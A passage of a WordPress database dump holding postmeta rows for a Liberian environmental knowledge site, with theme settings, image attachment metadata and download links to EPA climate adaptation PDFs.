extra_video_height','480'),(35658,5253,'kava_extra_video_loop','false'),(35659,5253,'kava_extra_video_autoplay','false'),(35660,5253,'kava_extra_video_preload','false'),(35661,5256,'_edit_lock','1674211307:42'),(35662,5256,'_last_editor_used_jetpack','block-editor'),(35663,5256,'_edit_last','42'),(35664,5256,'kava_extra_enable_breadcrumbs','inherit'),(35665,5256,'post_formats',''),(35666,5256,'gallery_tab',''),(35667,5256,'kava_extra_gallery_images',''),(35668,5256,'link_tab',''),(35669,5256,'kava_extra_link',''),(35670,5256,'kava_extra_link_target','_blank'),(35671,5256,'quote_tab',''),(35672,5256,'kava_extra_quote_text',''),(35673,5256,'kava_extra_quote_cite',''),(35674,5256,'audio_tab',''),(35675,5256,'kava_extra_audio',''),(35676,5256,'kava_extra_audio_loop','false'),(35677,5256,'kava_extra_audio_autoplay','false'),(35678,5256,'kava_extra_audio_preload','false'),(35679,5256,'video_tab',''),(35680,5256,'kava_extra_video_type','library'),(35681,5256,'kava_extra_video_library',''),(35682,5256,'kava_extra_video_external',''),(35683,5256,'kava_extra_video_poster',''),(35684,5256,'kava_extra_video_width','770'),(35685,5256,'kava_extra_video_height','480'),(35686,5256,'kava_extra_video_loop','false'),(35687,5256,'kava_extra_video_autoplay','false'),(35688,5256,'kava_extra_video_preload','false'),(35689,5258,'_wp_attached_file','2023/01/MRVRoundtable.jpg'),(35690,5258,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:25:\"2023/01/MRVRoundtable.jpg\";s:8:\"filesize\";i:130428;s:5:\"sizes\";a:11:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"MRVRoundtable-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15014;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"MRVRoundtable-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7589;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"MRVRoundtable-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:61013;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"MRVRoundtable-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25706;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:24:\"MRVRoundtable-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5248;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:25:\"MRVRoundtable-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14716;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:25:\"MRVRoundtable-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:32949;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:25:\"MRVRoundtable-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:34194;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:25:\"MRVRoundtable-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:49247;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:25:\"MRVRoundtable-600x311.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42690;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:25:\"MRVRoundtable-640x530.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:68207;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(35693,5256,'_thumbnail_id','5258'),(35694,5259,'_last_editor_used_jetpack','classic-editor'),(35695,5259,'_edit_lock','1674558449:42'),(35696,5259,'_edit_last','42'),(35697,5260,'_wp_attached_file','2023/01/IMG_E1901.jpg'),(35698,5260,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1170;s:6:\"height\";i:1658;s:4:\"file\";s:21:\"2023/01/IMG_E1901.jpg\";s:8:\"filesize\";i:476347;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"IMG_E1901-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10988;}s:5:\"large\";a:5:{s:4:\"file\";s:22:\"IMG_E1901-723x1024.jpg\";s:5:\"width\";i:723;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:90231;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"IMG_E1901-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5840;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"IMG_E1901-768x1088.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1088;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:97489;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:23:\"IMG_E1901-1084x1536.jpg\";s:5:\"width\";i:1084;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:156849;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:21:\"IMG_E1901-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25732;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:20:\"IMG_E1901-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4617;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:21:\"IMG_E1901-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12348;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:21:\"IMG_E1901-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35047;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:21:\"IMG_E1901-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30995;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:21:\"IMG_E1901-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:53466;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:22:\"IMG_E1901-1170x650.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:142229;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:23:\"IMG_E1901-1170x1080.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:173057;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:21:\"IMG_E1901-600x850.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:850;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:68501;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:21:\"IMG_E1901-640x640.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:73066;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:22:\"IMG_E1901-1170x640.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:140654;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(35699,5261,'_wp_attached_file','2023/01/LIBERIA_-NAP_-FINAL_-DOCUMENT.pdf'),(35700,5261,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:3547938;}'),(35701,5262,'_wp_attached_file','2023/01/nap.png'),(35702,5262,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:15:\"2023/01/nap.png\";s:8:\"filesize\";i:140589;s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"nap-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:42883;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:15:\"nap-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:154951;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:14:\"nap-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:35477;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:15:\"nap-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:95170;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(35703,5259,'_wp_page_template','default'),(35704,5259,'download_link','https://ekmsliberia.info/wp-content/uploads/2023/01/LIBERIA_-NAP_-FINAL_-DOCUMENT.pdf'),(35705,5259,'by','EPA'),(35706,5259,'year','2023'),(35707,5259,'_pods_document_cover_image','a:1:{i:0;i:5262;}'),(35708,5259,'document_cover_image','5262'),(35709,5259,'_pods_attached_document','a:1:{i:0;i:5261;}'),(35710,5259,'attached_document','5261'),(35711,5264,'_last_editor_used_jetpack','classic-editor'),(35712,5264,'_edit_lock','1674558944:42'),(35713,5264,'_edit_last','42'),(35714,5265,'_wp_attached_file','2023/01/doc.png'),(35715,5265,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:15:\"2023/01/doc.png\";s:8:\"filesize\";i:29928;s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"doc-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:16062;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:15:\"doc-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:29894;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:14:\"doc-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:9962;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:15:\"doc-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:41805;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(35716,5266,'_wp_attached_file','2023/01/First_Adaptation_Communication_AdCom_LIBERIA.pdf'),(35717,5266,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:2189998;}'),(35718,5264,'_wp_page_template','default'),(35719,5264,'download_link','https://ekmsliberia.info/wp-content/uploads/2023/01/First_Adaptation_Communication_AdCom_LIBERIA.pdf'),(35720,5264,'by','EPA'),(35721,5264,'year','2021'),(35722,5264,'_pods_document_cover_image','a:1:{i:0;i:5265;}'),(35724,5264,'_pods_attached_document','a:1:{i:0;i:5266;}'),(35726,5264,'document_cover_image','5265'),(35727,5264,'attached_document','5266'),(35728,5268,'_edit_lock','1674643645:42'),(35729,5268,'_last_editor_used_jetpack','block-editor'),(35732,5268,'_thumbnail_id','5258'),(35733,5268,'_edit_last','42'),(35736,5268,'kava_extra_enable_breadcrumbs','inherit'),(35737,5268,'post_formats',''),(35738,5268,'gallery_tab',''),(35739,5268,'kava_extra_gallery_images',''),(35740,5268,'link_tab',''),(35741,5268,'kava_extra_link',''),(35742,5268,'kava_extra_link_target','_blank'),(35743,5268,'quote_tab',''),(35744,5268,'kava_extra_quote_text',''),(35745,5268,'kava_extra_quote_cite',''),(35746,5268,'audio_tab',''),(35747,5268,'kava_extra_audio',''),(35748,5268,'kava_extra_audio_loop','false'),(35749,5268,'kava_extra_audio_autoplay','false'),(35750,5268,'kava_extra_audio_preload','false'),(35751,5268,'video_tab',''),(35752,5268,'kava_extra_video_type','library'),(35753,5268,'kava_extra_video_library',''),(35754,5268,'kava_extra_video_external',''),(35755,5268,'kava_extra_video_poster',''),(35756,5268,'kava_extra_video_width','770'),(35757,5268,'kava_extra_video_height','480'),(35758,5268,'kava_extra_video_loop','false'),(35759,5268,'kava_extra_video_autoplay','false'),(35760,5268,'kava_extra_video_preload','false'),(35761,5271,'_edit_lock','1675247080:42'),(35762,5271,'_last_editor_used_jetpack','block-editor'),(35763,5272,'_wp_attached_file','2023/02/ded.jpg'),(35764,5272,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:15:\"2023/02/ded.jpg\";s:8:\"filesize\";i:131675;s:5:\"sizes\";a:11:{s:6:\"medium\";a:5:{s:4:\"file\";s:15:\"ded-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11770;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"ded-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6585;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:15:\"ded-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:43235;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:15:\"ded-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19471;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:14:\"ded-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4821;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:15:\"ded-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11774;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:15:\"ded-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24701;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:15:\"ded-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25632;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:15:\"ded-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:36272;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:15:\"ded-600x311.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30726;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:15:\"ded-640x530.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:45619;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:11:\"NIKON Z 7_2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1671305278\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"64\";s:3:\"iso\";s:4:\"2000\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(35767,5271,'_wp_old_date','2023-02-01'),(35768,5271,'_thumbnail_id','5272'),(35769,5271,'_edit_last','42'),(35771,5271,'kava_extra_enable_breadcrumbs','inherit'),(35772,5271,'post_formats',''),(35773,5271,'gallery_tab',''),(35774,5271,'kava_extra_gallery_images',''),(35775,5271,'link_tab',''),(35776,5271,'kava_extra_link',''),(35777,5271,'kava_extra_link_target','_blank'),(35778,5271,'quote_tab',''),(35779,5271,'kava_extra_quote_text',''),(35780,5271,'kava_extra_quote_cite',''),(35781,5271,'audio_tab',''),(35782,5271,'kava_extra_audio',''),(35783,5271,'kava_extra_audio_loop','false'),(35784,5271,'kava_extra_audio_autoplay','false'),(35785,5271,'kava_extra_audio_preload','false'),(35786,5271,'video_tab',''),(35787,5271,'kava_extra_video_type','library'),(35788,5271,'kava_extra_video_library',''),(35789,5271,'kava_extra_video_external',''),(35790,5271,'kava_extra_video_poster',''),(35791,5271,'kava_extra_video_width','770'),(35792,5271,'kava_extra_video_height','480'),(35793,5271,'kava_extra_video_loop','false'),(35794,5271,'kava_extra_video_autoplay','false'),(35795,5271,'kava_extra_video_preload','false'),(35799,5271,'_wp_old_date','2023-01-12'),(35800,5276,'_edit_lock','1675942959:42'),(35801,5276,'_last_editor_used_jetpack','block-editor'),(35802,5277,'_wp_attached_file','2023/02/wetland.jpg'),(35803,5277,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:19:\"2023/02/wetland.jpg\";s:8:\"filesize\";i:394855;s:5:\"sizes\";a:11:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"wetland-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20412;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"wetland-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10214;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"wetland-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:128952;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:19:\"wetland-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:46204;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:18:\"wetland-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5920;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:19:\"wetland-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23548;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:19:\"wetland-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:66868;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:19:\"wetland-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:74334;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:19:\"wetland-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:106213;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:19:\"wetland-600x311.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:80790;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:19:\"wetland-640x530.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:156996;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(35806,5276,'_thumbnail_id','5277'),(35807,5276,'_edit_last','42'),(35810,5276,'kava_extra_enable_breadcrumbs','inherit'),(35811,5276,'post_formats',''),(35812,5276,'gallery_tab',''),(35813,5276,'kava_extra_gallery_images',''),(35814,5276,'link_tab',''),(35815,5276,'kava_extra_link',''),(35816,5276,'kava_extra_link_target','_blank'),(35817,5276,'quote_tab',''),(35818,5276,'kava_extra_quote_text',''),(35819,5276,'kava_extra_quote_cite',''),(35820,5276,'audio_tab',''),(35821,5276,'kava_extra_audio',''),(35822,5276,'kava_extra_audio_loop','false'),(35823,5276,'kava_extra_audio_autoplay','false'),(35824,5276,'kava_extra_audio_preload','false'),(35825,5276,'video_tab',''),(35826,5276,'kava_extra_video_type','library'),(35827,5276,'kava_extra_video_library',''),(35828,5276,'kava_extra_video_external',''),(35829,5276,'kava_extra_video_poster',''),(35830,5276,'kava_extra_video_width','770'),(35831,5276,'kava_extra_video_height','480'),(35832,5276,'kava_extra_video_loop','false'),(35833,5276,'kava_extra_video_autoplay','false'),(35834,5276,'kava_extra_video_preload','false'),(35835,5280,'_edit_lock','1676973720:42'),(35836,5280,'_last_editor_used_jetpack','block-editor'),(35837,5281,'_wp_attached_file','2023/02/missearth.jpg'),(35838,5281,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:21:\"2023/02/missearth.jpg\";s:8:\"filesize\";i:262201;s:5:\"sizes\";a:11:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"missearth-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17062;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"missearth-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7907;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"missearth-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:81410;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:21:\"missearth-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30173;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:20:\"missearth-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5842;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:21:\"missearth-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15604;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:21:\"missearth-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37790;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:21:\"missearth-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37896;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:21:\"missearth-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:60306;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:21:\"missearth-600x311.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:53860;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:21:\"missearth-640x530.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:81855;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1676973439\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(35841,5280,'_wp_old_date','2023-02-21'),(35842,5280,'_thumbnail_id','5281'),(35843,5280,'_edit_last','42'),(35846,5280,'kava_extra_enable_breadcrumbs','inherit'),(35847,5280,'post_formats',''),(35848,5280,'gallery_tab',''),(35849,5280,'kava_extra_gallery_images',''),(35850,5280,'link_tab',''),(35851,5280,'kava_extra_link',''),(35852,5280,'kava_extra_link_target','_blank'),(35853,5280,'quote_tab',''),(35854,5280,'kava_extra_quote_text',''),(35855,5280,'kava_extra_quote_cite',''),(35856,5280,'audio_tab',''),(35857,5280,'kava_extra_audio',''),(35858,5280,'kava_extra_audio_loop','false'),(35859,5280,'kava_extra_audio_autoplay','false'),(35860,5280,'kava_extra_audio_preload','false'),(35861,5280,'video_tab',''),(35862,5280,'kava_extra_video_type','library'),(35863,5280,'kava_extra_video_library',''),(35864,5280,'kava_extra_video_external',''),(35865,5280,'kava_extra_video_poster',''),(35866,5280,'kava_extra_video_width','770'),(35867,5280,'kava_extra_video_height','480'),(35868,5280,'kava_extra_video_loop','false'),(35869,5280,'kava_extra_video_autoplay','false'),(35870,5280,'kava_extra_video_preload','false'),(35871,5286,'_wp_attached_file','2022/01/Chemical-Guidelines-original.pdf'),(35872,5286,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:231213;}'),(35873,4556,'document_cover_image','4557'),(35874,4556,'_pods_attached_document','a:1:{i:0;i:5286;}'),(35875,4556,'attached_document','5286'),(35876,5289,'_edit_lock','1679481931:42'),(35877,5